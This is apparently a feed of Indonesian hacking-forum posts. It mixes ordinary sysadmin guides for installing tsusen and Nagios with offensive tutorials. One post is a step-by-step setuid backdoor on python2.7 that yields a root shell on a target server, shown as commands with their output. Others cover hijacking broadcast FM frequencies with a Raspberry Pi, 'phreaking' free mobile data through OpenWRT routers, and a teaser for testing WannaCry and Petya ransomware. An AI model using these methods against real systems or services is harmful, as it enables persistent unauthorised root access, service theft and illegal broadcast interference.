
Wed, 17 Jan 2018 06:25:16 +0000

Membajak frekuensi radio menggunakan raspberry pi dan kawat

Sun, 10 Dec 2017 07:11:15 +0000

Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..

Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.

Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.

Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu fm_transmiter
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.

Code:
$ sudo apt-get install make gcc g++

$ git clone https://github.com/markondej/fm_transmitter

$ cd fm_transmitter

$ sudo make

$ sudo cp fm_transmitter /usr/bin/fm_transmitter

Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.

Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini

Code:
$ sudo fm_transmitter -f 103.800 -r sound.wav

Penjelasan:
-f = Frekuensi yang akan kita injeksi
-r = Nama file yang akan kita transmit ke frekuensi

Cukup mudah bukan caranya??
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.

Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.
Mohon maaf kalo ada kata yang kurang jelas.
Akhir kata, wasalam =))

Tanam rootkit tanpa menambahkan file/rootkit ke dalam server

Sat, 18 Nov 2017 10:25:36 +0000

Oke kali ini saya coba sharing trik sederhana cara menanam rootkit tanpa upload rootkit/file ke dalam server.
Gimana caranya?? Ko bisa?? Penasaran bukan??

Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini

Code:
$ chmod +s /usr/bin/python2.7

Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini

Code:
$ id

uid=1000(user) gid=1000(user) groups=1000(user)

$ python

Python 2.7.14 (default, Sep 23 2017, 22:06:14) 

[GCC 7.2.0] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>> import os

>>> os.setuid(0)

>>> os.setgid(0)

>>> os.system('id')

uid=0(root) gid=0(root) groups=0(root),1000(user)

>>> os.system('/bin/bash')

$ id

uid=0(root) gid=0(root) groups=0(root),1000(user)

Cukup mudah bukan??
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid di sini. Kali ini caranya cukup sederhana banget bukan. :)

Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe

Mungkin cukup sekian tutorial dari saya.
Semoga tutorialnya bermanfaat. :)

VPN GRATIS Dengan Layanan PORT FORWARDING

Sat, 18 Nov 2017 04:26:43 +0000

Sudah banyak yang tahu tentang NGROK kan? Yah, Ngrok memang gratis. Tapi amat disayangkan port Ngrok selalu berganti bagi user gratisan. Solusinya adalah dengan menggunakan TUNNEL.MY.ID
Jika tidak salah, situs TUNNEL.MY.ID ini dibuat oleh KangArie.

Q&A

Q: Untuk siapa layanan vpn port forward, vpn interkoneksi, dan HTTP reserve proxy?

A: Untuk router yang koneksi internetnya tidak memiliki akses ke IP Public

Q: Apa contoh router yang ga dpt akses ke IP public?

A: Pengguna Modem GSM/CDMA, pengguna wifi.id, client rt/rw net

Q: Ini untuk internet gratis atau menghemat quota?

A: Bukan

Q: Ini untuk traffic keluar, misal utk main game atau browsing atau ganti ip public?

A: Bukan

Q: Apakah ada quota utk tunnel DNS?

A: Tidak ada

Q: Kapan akun vpn akan dihapus?

A: Jika anda free member, maka sistem akan menghapus akun vpn jika selama seminggu vpn tidak aktif

Q: Apakah layanan ini gratis?

A: Ya, server US free. Sedangkan server ID berbayar. Untuk DDNS dan Userman gratis

Nah begitulah kira - kira. Ane sempet dokumentasiin dikit pas nyoba buat port forward Apache.
Langsung saja deh kalian simak video dibawah ini.

Oke sekian gitu aja, semoga bermanfaat!

Phreaking with OpenWRT

Thu, 09 Nov 2017 18:31:53 +0000

Mumpung sedang nganggur dan suntuk gatau mau ngapain, mendingan nulis di forum ya kan. Nulis dikit lah gapapa.
Oke jadi mungkin udah pada ga asing lagi sama yang namanya OpenWRT. Apaan sih? Cari tau aja di situs OpenWRT langsung.
Intinya dengan OpenWRT yang OpenSource ini kita bisa ngerubah router menjadi lebih dari sekedar router, maksudnya router itu bisa dikembangkan lagi, misalnya untuk keperluan IoT Device, Web Server, File Sharing Server, CCTV, Print Server, Music Player Server, Downloader Server, dsb. Nah dalam thread kali ini kita bakalan gunain untuk kepentingan Phreaking (baca: gretongan).

Penampakan HG553

Kenapa phreaking pake Router ber-OpenWRT?
Phreaking ISP GSM biasanya dilakukan di HP/Komputer. Artinya HP/Komputer perlu nyala terus cuma buat kegiatan phreaking. Dengan melakukan phreaking di router ber-OpenWRT yang memang salah satu tugasnya adalah untuk selalu menyala, maka Laptop udah gaperlu nyala secara nonstop lagi, kasihan kan kalo dipaksa nyala nonstop. Lalu phreaking biasanya menuntut Laptop/HP untuk menjalankan beberapa tools program yang dibutuhkan (misalnya pakai HTTP Injector, Inject PC, Bitvise, KPN Tunnel, Psiphone, dsb) yang tentunya ini bikin risih, sekaligus memakan resource Laptop/HP yang ada, makanya kita pake router ber-OpenWRT supaya Laptop/HP kita tinggal connect saja via WiFi si router (atau kabel LAN) tanpa perlu menjalankan tools program tambahan. Jadi, soal tugas phreaking akan benar-benar didedikasikan oleh si router saja.

Alat :
- Huawei HG553 Wireless Router (WAJIB)
- Sierra312U USB Modem (atau modem lain)
- SIM Card dengan ISP yang lagi bisa dipake gretongan (misal : Tri)
Bahan :
- Firmware LEDE Pulpstone (TUTOR FLASHING)
- Firmware OpenWRT CC Angel Beats (Tutor ada didalam file)
- Akun SSH/VPN (misalnya dari FastSSH)
- Payload

Tata cara flash, jika HG553 kalian masih pakai firmware original :
Flash LEDE Pulpstone pakai opsi Firmware Upgrade > lalu Flash OpenWRT CC Angel Beats

Semua tutor lengkap Flash udah tertera di file firmware yang kalian download diatas, jadi budayakan membaca!

Proof :

Oke sekian seperti itu saja. Semoga bermanfaat.

Cara install tsusen di Ubuntu 16.04/17.04 (Monitoring trafic berbasis web)

Sun, 22 Oct 2017 16:11:18 +0000

Malam guys..
Kali ini saya akan coba mempraktekan cara install tsusen di dalam web server..
Sebelum masuk ke tutorial ada yang tau tsusen itu apa??

Okay, mungkin saya akan menjelaskan secara singkat mengenai tsusen ini..
Tsusen adalah aplikasi untuk monitoring setiap trafic masuk di dalam port tcp. Aplikasi ini cocok buat kalian yang ingin memperdalam untuk menjadi sysadmin. Di tsusen ini kita bisa memonitoring ip mana saja yang melakukan request masuk yang paling banyak ke dalam web server kita. Untuk informasi lebih lanjut bisa di lihat di github informasinya.

Kita lanjut ke tutorial, caranya cukup mudah kita tinggal ketik perintah ini di console..

Code:
root[~] >> apt-get install git python-pip python-pcapy screen

root[~] >> pip install python-geoip python-geoip-geolite2

root[~] >> git clone https://github.com/stamparm/tsusen

Untuk menjalankannya melalui backgroun kita bisa ketik di terminal menggunakan screen agar si tsusennya bisa terus berjalan saat terminal kita di close. Kurang lebih perintahnya seperti ini.

Code:
root[~] >> screen

root[/root/tsusen] >> cd tsusen/

root[/root/tsusen] >> python tsusen.py

Saat tsusen berjalan, secara default dia akan membuka port 3889
Untuk mengaksesnya kita tinggal buka alamat ip address atau domain di tambah port 3889 di dalam browser.
Contoh alamatnya seperti ini:

Quote:http://backboxindonesia.or.id:3889

Kurang lebih hasilnya akan menjadi seperti ini

Mungkin cukup sekian tutor dari saya.
Semoga ilmunya bermanfaat...

Install nagios di ubuntu 16.04/17.04 server

Fri, 06 Oct 2017 06:43:06 +0000

Perintah untuk install nagios

Code:
user[~] >> sudo su

root[~] >> apt-get install wget build-essential apache2 php apache2-mod-php7.0 php-gd libgd-dev sendmail unzip

root[~] >> useradd nagios

root[~] >> groupadd nagcmd

root[~] >> usermod -a -G nagcmd nagios

root[~] >> usermod -a -G nagios,nagcmd www-data

root[~] >> cd ~

root[~] >> wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz

root[~] >> tar -xzf nagios*.tar.gz

root[~] >> cd nagios-4.3.2/

root[~] >> ./configure --with-nagios-group=nagios --with-command-group=nagcmd

root[~] >> make all

root[~] >> make install

root[~] >> make install-commandmode

root[~] >> make install-init

root[~] >> make install-config

root[~] >> /usr/bin/install -c -m 644 sample-config/httpd.conf /etc/apache2/sites-available/nagios.conf

root[~] >> cp -R contrib/eventhandlers/ /usr/local/nagios/libexec/

root[~] >> chown -R nagios:nagios /usr/local/nagios/libexec/eventhandlers

root[~] >> cd ~

root[~] >> wget https://nagios-plugins.org/download/nagios-plugins-2.2.1.tar.gz

root[~] >> tar -xzf nagios-plugins*.tar.gz

root[~] >> cd nagios-plugin-2.2.1/

root[~] >> ./configure --with-nagios-user=nagios --with-nagios-group=nagios --with-openssl

root[~] >> make

root[~] >> make install

root[~] >> nano /usr/local/nagios/etc/objects/contacts.cfg

Edit contact email, contoh

Quote:email budi@backboxindonesia.or.id

Perintah selanjutnya

Code:
root[~] >> a2enmod rewrite

root[~] >> a2enmod cgi

root[~] >> htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin

Masukan password untuk login nagiosnya
Kemudian ketik lagi perintah di bawah

Code:
root[~] >> ln -s /etc/apache2/sites-available/nagios.conf /etc/apache2/sites-enabled/

root[~] >> nano /etc/systemd/system/nagios.service

Di dalam nano tambahkan script ini

Quote:[Unit]
Description=Nagios
BindTo=network.target

[Install]
WantedBy=multi-user.target

[Service]
User=nagios
Group=nagios
Type=simple
ExecStart=/usr/local/nagios/bin/nagios /usr/local/nagios/etc/nagios.cfg

Selanjutnya masukan perintah ini

Code:
root[~] >> systemctl enable /etc/systemd/system/nagios.service

root[~] >> systemctl apache2 restart

root[~] >> systemctl nagios start

root[~] >> systemctl nagios restart

Testing nagios di browser, contoh alamatnya http://192.168.1.69/nagios/
Kalo muncul popup login berarti nagios sudah kita install.
Setelah itu masukkan username dan password yang telah kita buat tadi. Sebagai contoh

Quote:User : nagiosadmin
Pass : passwordygkitabuattadi

Step selanjutnya menambahkan host di dalam nagios, perintahnya adalah

Code:
root[~] >> apt-get install nagios-nrpe-server nagios-plugins

root[~] >> nano /etc/nagios/nrpe.cfg

Ganti server_address dengan ip address kita

Quote:server_address=192.168.1.69

Masukan perintah ini

Code:
root[~] >> service nagios-nrpe-server restart

root[~] >> nano /usr/local/nagios/etc/objects/baru.cfg

Masukan script ini untuk menambahkan host ke dalam nagios

Quote:define host{
use linux-server
host_name Server
alias Server
address 192.168.1.2
}

Perintah selanjutnya adalah

Code:
root[~] >> nano /usr/local/nagios/etc/nagios.cfg

Setelah itu kita tambahkan script ini

Quote:cfg_file=/usr/local/nagios/etc/objects/baru.cfg

Sampai di sini nagios sudah bisa kita gunakan. Untuk perintah selanjutnya kita reload terlebih dahulu nagiosnya sebelum kita buka di browser dengan perintah ini.

Code:
root[~] >> /etc/init.d/nagios restart

Setelah di restart kita buka alamat ini http://192.168.1.69/nagios/ di browser. Dan setelah di tambah beberapa host di config nagios kurang lebih seperti ini tampilannya..

Maaf kalo tutorialnya singkat banget. hehe
Akhir kata, selamat belajar. :)

Tutorial Testing WannaCry and Petrwrap Petya 2017

Mon, 03 Jul 2017 12:32:46 +0000

Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.
Yaitu Ransomware WannaCry dan Petrwrap/Petya.
Gunakan Dengan Resiko Anda Sendiri.
Untuk tujuan pembelajaran saja.
Untuk tujuan pendidikan saja
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR.
KALO GABISA DECRYPT NYA !!! :V :gerah:lol